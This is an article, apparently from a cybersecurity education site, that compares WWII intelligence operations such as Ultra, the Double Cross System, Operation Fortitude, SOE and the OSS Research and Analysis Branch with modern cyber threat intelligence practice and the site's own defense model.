The PDM Through History: How WWII Intelligence Operations Mirror Modern CTI
Every tool in the modern cyber threat intelligence toolkit has a direct precedent in the intelligence operations of the Second World War.
Last updated Apr 11, 2026
Continue your mission
Every tool in the modern cyber threat intelligence toolkit has a direct precedent in the intelligence operations of the Second World War.
# The PDM Through History: How WWII Intelligence Operations Mirror Modern CTI
Every tool in the modern cyber threat intelligence toolkit has a direct precedent in the intelligence operations of the Second World War. Not a loose analogy. Not an inspirational parallel. A structural precedent: the same functional requirements, the same operational challenges, the same failure modes, solved by different technologies in service of the same goal.
The goal is Predictive Defense Intelligence (PDI): see the threat before it sees you. CDA's PDI methodology governs TID (Threat Intelligence and Defense), the atmospheric layer of the Planetary Defense Model that exists to detect threats before they reach terrain, identify adversaries before they reach civilization, and produce actionable intelligence before attackers reach the core.
In 1939, that meant signals intelligence from decrypted Enigma traffic, human intelligence from turned double agents, strategic deception through fabricated order-of-battle data, and open-source intelligence assembled by hundreds of analysts in Washington and London. In 2026, it means SIEM platforms, threat intelligence feeds, adversary simulation red teams, honeypots, and OSINT aggregation. The operators are different. The discipline is identical.
This article examines six specific WWII intelligence programs and maps each to a component of modern cyber threat intelligence. The argument is not that studying history will make you a better analyst, though it might. The argument is that the CTI discipline practitioners treat as emerging is not emerging at all. It is mature. Its first practitioners worked in attic offices in Bletchley Park and basement rooms in London. The lessons they learned, paid for with operational risk and sometimes catastrophic failure, are encoded in the frameworks CTI practitioners use today, often without knowing where they came from.
Operation Ultra was the Allied signals intelligence program built on the cryptanalysis of German Enigma machine traffic. The Enigma was a commercial cipher machine adopted by the German military and modified with additional security rotors: it produced polyalphabetic substitution ciphers that changed with every keystroke, theoretically producing an astronomical number of possible configurations. German operators and commanders believed it was unbreakable.
It was not. The Polish Cipher Bureau had already made substantial progress against early Enigma variants by 1939. When Poland was overrun, the Polish cryptanalysts shared their work with British and French counterparts. At Bletchley Park, a team that eventually grew to over 10,000 people, working in shifts around the clock, broke Enigma traffic operationally for the first time in 1940. By the height of the war, Bletchley was reading Luftwaffe, Army, and Naval Enigma traffic within hours of transmission.
Ultra is technical intelligence (TECHINT) and signals intelligence (SIGINT) in their modern forms. The Enigma break is a cryptanalytic operation, which maps to modern cryptographic vulnerability research and traffic analysis. The sustained processing of decrypted traffic, categorizing messages by sender, recipient, content type, and operational significance, maps to what modern CTI platforms call structured threat intelligence: raw signals processed into analyzed, contextualized intelligence products.
The PDI methodology's tagline, "See the threat before it sees you," was operationalized at Bletchley Park before the term threat intelligence existed. When Ultra produced intelligence indicating German submarine positions in the North Atlantic, convoy routes were altered before contact. The threat was seen, and the defended asset (the convoy) was moved. That is PDI in its purest form: not detecting the attack in progress but shaping the environment before the attack can be initiated.
The failure mode Ultra eventually confronted is the same failure mode facing modern SIGINT-derived CTI: intelligence that is acted upon in ways that reveal its existence to the adversary. The Allies developed strict protocols for how Ultra intelligence could be used operationally, always requiring a plausible alternative explanation for how the information was obtained. A convoy that always diverted precisely when a submarine was in its path would eventually tell the German Navy that their communications were being read. The same discipline applies to modern threat intelligence: acting on intelligence without revealing the collection mechanism is both an operational security requirement and a long-term capability preservation strategy.
By 1941, MI5 had successfully captured or turned every German intelligence agent operating in Britain. Rather than simply arresting them, MI5's Double Cross Committee, formally known as the Twenty Committee for the Roman numeral XX, ran the agents as double agents: feeding Germany carefully constructed disinformation that appeared genuine, contained enough accurate low-value information to maintain credibility, and guided German intelligence toward false conclusions about Allied capabilities, intentions, and order-of-battle.
The Double Cross System is the direct precedent for two modern CTI tools: deception technology and honeypots.
Deception technology, in modern CTI, places false assets (fake servers, fake credentials, fake data stores) in an environment to attract attackers and collect intelligence on their techniques, while keeping them occupied with assets that have no real value. The Double Cross agents were exactly this: false assets that appeared to be high-value sources of genuine intelligence but were completely under Allied control. Germany invested significant operational resources in running agent networks that were feeding their adversaries information and providing MI5 with detailed visibility into German intelligence priorities and collection methods.
Honeypots operate on the same logic at the network level: a system designed to attract adversary activity, appear vulnerable, and log everything the attacker does in enough detail to identify their techniques, tools, and procedures. An adversary who targets a honeypot reveals their methodology, their tooling, and often their operational pattern, without gaining access to anything of value. The Double Cross agents, from the adversary's perspective, were legitimate intelligence sources. From MI5's perspective, they were detailed windows into German intelligence operations.
MITRE ATT&CK, the adversary behavior framework that modern CTI teams use to map threat actor techniques, is structured around exactly what MI5 was building from Double Cross reporting: a model of how a specific adversary thinks, what tools they prefer, what methods they use for communications, and how they prioritize intelligence collection. The Twenty Committee's operational records are an early version of an ATT&CK threat actor profile.
Operation Fortitude was the strategic deception operation that preceded the D-Day landings in June 1944. Its purpose was to convince the German High Command that the primary Allied landing in France would come at the Pas-de-Calais rather than Normandy, and that even after the Normandy landings began, the main invasion was still to come. To accomplish this, Fortitude created a fictitious army group commanded by General George Patton, fabricated radio traffic and supply movements, used Double Cross agents to reinforce the deception, and managed the Allied bombing campaign to attack Pas-de-Calais infrastructure at a ratio that suggested it was the primary target.
Fortitude was adversary simulation operating offensively: Allied planners modeled German intelligence collection methods, German analytical frameworks, and German command decision-making, then crafted a picture that would produce the desired conclusion in a German analyst's mind. They were not just creating false information. They were creating false information specifically tailored to how the adversary processed information.
This is precisely what a red team does. A modern adversary simulation engagement does not simply test whether defenses can detect generic attack traffic. It replicates the specific techniques, tools, and operational patterns of a named threat actor, testing whether the defending organization's detection capability can identify activity that matches a real adversary's fingerprint rather than a generic attacker's behavior. Fortitude was a red team exercise at strategic scale: model the adversary, think like the adversary, produce outputs that the adversary's analytical process will interpret as genuine.
The lesson for modern CTI is that adversary simulation requires genuine threat actor modeling. Fortitude succeeded because Allied intelligence had a detailed understanding of how German intelligence operated, what sources they trusted, how their analytical process worked, and what conclusions they were predisposed to reach. A red team engagement that does not begin with specific threat actor intelligence is not adversary simulation. It is generic penetration testing.
The Special Operations Executive, established by Churchill in July 1940 with instructions to "set Europe ablaze," was a clandestine operations organization that conducted sabotage, subversion, and support for resistance movements across Occupied Europe and Asia. SOE operated behind enemy lines through networks of locally recruited agents, trained at secret facilities in Britain, and inserted by parachute or clandestine boat landing.
SOE's operational toolkit maps almost exactly to what modern security operations calls offensive cyber capability. Sabotage of enemy infrastructure (rail lines, power stations, communications facilities) is the equivalent of disruption operations targeting critical infrastructure. The creation and management of agent networks in denied territory is the equivalent of persistent access operations: establishing a presence in a network, maintaining it covertly over time, and using it when operational requirements demand. SOE's communications security, using one-time pad ciphers and scheduled transmission windows to reduce radio direction-finding exposure, is operational tradecraft that any red team operator would recognize.
The critical lesson SOE provides for modern CTI is the cost of poor OPSEC at the operator level. When the German counterintelligence service (the Abwehr and later the SD) captured SOE agents in the Netherlands, they forced the agents to continue radio transmissions under German control in an operation known as Englandspiel, or the England Game. SOE's London headquarters, recognizing signs that the network was compromised but choosing not to act on them for organizational and bureaucratic reasons, continued the operation for nearly two years, inadvertently sending agents into German capture.
This is the insider threat and compromised credentials failure mode that IAT and TID must jointly address. The Dutch section's leadership had indicators of compromise, but organizational processes failed to act on them. Every modern CTI program faces the same risk: indicators are present, but the organizational process to escalate and investigate is broken. The Englandspiel is the case study that no analyst who has read it can forget.
The Office of Strategic Services was the American wartime intelligence agency, predecessor to the CIA. Its Research and Analysis Branch, often overlooked in favor of its more dramatic operational divisions, was arguably the most innovative intelligence organization of the war. R&A assembled several hundred academics, economists, historians, geographers, and social scientists and tasked them with producing intelligence assessments from publicly available sources: newspapers, academic journals, commercial shipping records, railroad timetables, patent filings, and captured documents.
The R&A Branch invented Open Source Intelligence (OSINT) as a systematic intelligence discipline. Their analysts understood something that seemed counterintuitive: an adversary engaged in a total war economy cannot fully conceal that economy from public observation. Factory locations, railroad capacity, shipping volumes, fuel consumption rates, and industrial output are all partially visible in publicly available sources if you know how to look and how to aggregate. R&A estimates of German industrial capacity, derived primarily from open sources, proved more accurate than many estimates produced by clandestine collection programs.
Modern OSINT in CTI operates on identical principles. An adversary conducting a campaign against a target cannot fully conceal their infrastructure. Domain registrations, TLS certificate transparency logs, passive DNS, BGP routing tables, GitHub commit histories, code signing certificates, and job postings from threat actor-affiliated organizations all produce observable signals in publicly available data. A skilled OSINT analyst, working the same way R&A's historians worked through European newspaper archives, can map adversary infrastructure, identify tooling patterns, and sometimes attribute activity with confidence from purely open sources.
The R&A precedent matters for a practical reason: most CTI programs underinvest in OSINT relative to its return. Clandestine collection programs are expensive, slow, and sometimes counterproductive. Open source collection is fast, cheap, and often sufficient. R&A's contribution to the Allied victory was disproportionate to its budget precisely because its analysts understood that the most valuable signals were hiding in plain sight.
Every modern CTI framework, from NIST SP 800-150's guidance on cyber threat information sharing to the frameworks used by threat intelligence platforms like Recorded Future and Mandiant, organizes intelligence work around a cycle of six phases: requirements definition, collection, processing, analysis, dissemination, and feedback.
That cycle is not a modern invention. It is the formalization of a process that the British Joint Intelligence Committee, established in 1936 and fully operational by the start of the war, developed to coordinate intelligence production across MI5, MI6, the Service intelligence directorates, and Ultra. The cycle emerged because the alternative, uncoordinated parallel intelligence programs producing redundant or conflicting products for the same consumers, generated confusion that cost lives. The cycle was a management solution to an organizational problem.
Modern CTI programs that fail to implement the cycle consistently produce the same failure mode: collection without requirements, analysis without structured methodology, dissemination that reaches the wrong consumers in the wrong format at the wrong time, and no feedback mechanism to improve future production. The result is intelligence products that are technically accurate but operationally useless.
Requirements definition tells the collection function what the consumer actually needs to know, not what is interesting to collect. Collection without requirements produces data lakes, not intelligence. Processing converts raw collection into formats that analysis can work with. Analysis transforms processed data into assessments that answer the consumer's questions. Dissemination gets the assessment to the decision-maker in time to influence a decision. Feedback closes the loop, telling the collection and analysis functions whether the product was useful and what needs to change.
The Wartime Joint Intelligence Committee worked exactly this way. The failure at Pearl Harbor, where significant intelligence indicators were available but failed to reach decision-makers in actionable form, is a dissemination failure within the intelligence cycle. The success of Operation Overlord intelligence preparation, where assessments built from Ultra, agent reporting, aerial reconnaissance, and R&A analysis produced an accurate picture of German defensive dispositions in Normandy, is the cycle operating at full effectiveness.
The discipline of cyber threat intelligence is treated, in most of its practitioner literature, as an emerging field. It is not. It is a 90-year-old field applied to a new technical medium.
This matters for practitioners because the failure modes are not new. Confirmation bias in analysis, which led British intelligence to misread indicators before the German invasion of Norway in 1940, is the same confirmation bias that leads modern SOC analysts to dismiss anomalous activity that does not match the current threat model. The Englandspiel's failure to act on indicators of compromise is the same organizational inertia that allows modern intrusions to persist undetected for 200-plus days. R&A's open-source discipline, which produced better estimates than expensive clandestine programs, is the same lesson that OSINT-focused CTI teams rediscover every year.
Understanding the historical precedent makes the PDI methodology more than a tagline. "See the threat before it sees you" is a compression of everything Ultra, the Double Cross System, Fortitude, SOE, and R&A built and proved. The atmospheric layer of the PDM does not react to attacks that have already landed on the terrain. It extends visibility outward, past the curtain walls, to where adversary preparation is visible before the approach begins.
TID (Threat Intelligence and Defense) is the PDM's atmospheric layer, and the PDI methodology is its governing framework. CDA's approach to TID is structured around the intelligence cycle, not around tool categories. The question is not whether an organization has a SIEM or a threat intelligence platform. The question is whether the intelligence production cycle is operating effectively: are requirements driving collection, is collection producing analyzable data, is analysis producing actionable assessments, are assessments reaching the right consumers, and is feedback improving the next cycle?
Bletchley Park had hundreds of analysts and a mature production cycle. A modern SOC with three analysts and a SIEM can implement the same cycle at appropriate scale. The organizational discipline matters more than the tooling budget.
The Double Cross parallel to deception technology has direct implications for TID operations. Organizations that deploy honeypots without a process for analyzing the intelligence they collect are building a watchtower and then not staffing it. The honeypot is collection infrastructure. The intelligence value requires analysis: what TTPs did the adversary demonstrate, how do those TTPs match known threat actor profiles, what do the targeting choices reveal about adversary priorities?
Operation Fortitude's red team parallel speaks to a gap in most TID programs: adversary modeling. The PDI methodology requires understanding not just what threats exist but how specific threat actors think, what they prioritize, and how their decision-making process works. That is the intelligence that allows a defender to shape the environment before the attack rather than react to it after.
The R&A OSINT precedent is the operational argument for OSINT investment in every TID program. Open source collection is undervalued because it is not classified and does not require expensive tooling. The best intelligence on many threat actor groups is visible in public data for any analyst disciplined enough to look systematically.
The Shield diagnostic, CDA's PDM visualization tool, plots TID as the fifth ring from the core. A strong TID ring means the atmosphere is filtering threats before they reach terrain (SPH), civilization (IAT), or the core (DPS). A degraded TID ring means the organization is discovering attacks only after they have landed. WWII proved what a strong intelligence capability is worth. It proved equally clearly what its absence costs.
CDA Theater missions that address topics covered in this article.
The Enigma machine was an electro-mechanical cipher device used primarily by Nazi Germany during World War II to encrypt military communications.
On November 2, 1988, a Cornell University graduate student named Robert Tappan Morris released a self-replicating computer program onto the ARPANET, the research network that would become the public internet.
Malware is any software designed to disrupt, damage, or gain unauthorized access to a computer system.
Written by Evan Morgan
Found an issue? Help improve this article.